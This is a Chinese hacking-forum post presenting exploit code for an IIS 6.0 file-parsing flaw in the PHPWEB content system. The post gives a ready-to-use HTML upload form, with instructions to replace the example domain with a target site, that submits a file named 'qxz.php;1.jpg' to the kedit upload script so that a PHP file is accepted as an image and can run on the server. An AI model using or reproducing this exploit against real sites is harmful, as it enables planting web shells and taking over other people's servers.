HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    技术文档

PHPWEB IIS6.0解析漏洞利用源码

  •   youqian ·2017-10-12 14:42:50·198 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    PHPWEB IIS6.0解析漏洞,并附上利用源码
    请复制以下代码,保存为HTML,并替换代码里的www.gxsec.com网址为目标站地址

    1. <form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.gxsec.com/kedit/upload_cgi/upload.php">   
    2. <input type="text" name="fileName" value="qxz.php;1.jpg" />   
    3. <input type="hidden" name="attachPath" value="news/pics/" />   
    4. <input type="file" name="fileData" size="14" /></td>   
    5. <input type="submit" name="button" value="确定" />   
    6. </form>
    复制代码


    198 次点击  
    收藏  转播  分享
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   228 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-7-23 06:30, Processed in 0.044122 second(s), 18 queries .